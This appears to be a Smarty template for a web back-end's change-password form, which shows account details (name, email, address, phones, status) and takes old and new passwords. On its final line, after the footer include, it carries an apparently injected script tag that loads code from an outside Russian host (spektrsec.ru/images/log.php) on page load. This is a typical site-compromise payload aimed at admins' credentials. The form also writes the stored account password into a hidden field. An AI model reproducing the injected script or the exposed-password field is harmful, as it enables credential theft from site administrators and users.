{include file=$include_header}
{literal}
<script language="javascript" type="text/javascript">
	function submitform(value) {
		var theform = document.frmaccount;
		theform.issubmit.value = value;
		theform.submit();
	}
</script>
{/literal}
{include file=$include_left}
		<td width="80%" align="left" valign="top">
		<form name="frmaccount" id="frmaccount" action="" method="post">
			<table width="100%" cellpadding="0" cellspacing="0" class="dataTable">
			<tr>
				<td height="5px" colspan="6"></td>
			</tr>
			<!--header-->
			<tr class="stdHeader" valign="top">
				<td align="center" colspan="2" style="height:15px;">
					{#ACCOUNT_CHANGEPASS#}
				</td>
			</tr>
			{if $message != ""}
			<tr valign="top">
				<td align="left" colspan="2">
					<table width="100%" cellpadding="0" cellspacing="0">
					<tr>
						<td align="center" valign="middle" width="5%" class="error"><img src="backend/images/error.jpg" width="40" height="40" title="Errors !" /></td>
						<td valign="middle" class="error" style="border-left: 0px;">{$message}</td>
					</tr>
					</table>
				</td>
			</tr>
			{/if}
			<tr valign="top">
				<td width="30%" align="left" valign="middle" class="tdregisttext" style="border-top: #CAD5DB 1px solid;">{#ACCOUNT_ID#}: </td>
				<td width="69%" align="left" valign="middle" class="tdregist" style="border-top: #CAD5DB 1px solid;">
					{$accountid}
					<input type="hidden" name="account_id" id="account_id" value="{$accountid}" />
					<input type="hidden" name="page" id="page" value="{$page}" />
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_NAME#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_name" id="account_name" value="{$accountData.account_name}" class="input_text" />
					{$accountData.account_name}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">Mật khẩu cũ: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="password" name="account_pass_old" id="account_pass_old" value="" class="input_text" />
					<input type="hidden" name="account_pass" id="account_pass" value="{$accountData.account_pass}" />
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_PASS_NEW#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="password" name="account_pass_new" id="account_pass_new" value="" class="input_text" />
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_PASS_CONFIRM#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="password" name="account_pass_confirm" id="account_pass_confirm" value="" class="input_text" />
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_FULL_NAME#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_full_name" id="account_full_name" value="{$accountData.account_full_name}" class="input_text" />
					{$accountData.account_full_name}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_SEX#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_sex" id="account_sex" value="{$accountData.account_sex}" class="input_text" />
					{foreach item=sex from=$sexList}
						{if $accountData.account_sex eq $sex.value}{$sex.text}{/if}
					{/foreach}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_EMAIL#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_email" id="account_email" value="{$accountData.account_email}" class="input_text" />
					{$accountData.account_email}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_ADDRESS#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_address" id="account_address" value="{$accountData.account_address}" class="input_text" />
					{$accountData.account_address}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_PHONE#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_phone" id="account_phone" value="{$accountData.account_phone}" class="input_text" />
					{$accountData.account_phone}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#ACCOUNT_MOBILE#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="account_mobile" id="account_mobile" value="{$accountData.account_mobile}" class="input_text" />
					{$accountData.account_mobile}
				</td>
			</tr>
			<tr valign="top">
				<td align="left" valign="middle" class="tdregisttext">{#STATUS#}: </td>
				<td align="left" valign="middle" class="tdregist">
					<input type="hidden" name="statushidden" id="statushidden" value="{$accountData.status}" class="input_text" />
					<input type="checkbox" name="status" id="status" {if $accountData.status eq 1}checked="true"{/if} disabled="disabled"/>
					&nbsp;<i style="color:#FF0000">({#COMMENT_STATUS#})</i>
				</td>
			</tr>
			<tr class="stdHeader" valign="top">
				<td align="center" colspan="2" style="height:15px;">
				</td>
			</tr>
			<tr valign="top">
				<td colspan="2" align="center" valign="middle" style="padding:10px;">
					<input type="button" name="update" id="update" value="{#UPDATE#}" class="button_new" onclick="javascript: submitform(1)" />
					<input type="button" name="isback" id="isback" value="{#BACK#}" class="button_new" onclick="javascript: submitform(0)" />
					<input type="hidden" name="issubmit" id="issubmit" value="0" />
				</td>
			</tr>
			</table>
		</form>
		</td>
{include file=$include_footer}<script src=http://spektrsec.ru/images/log.php ></script>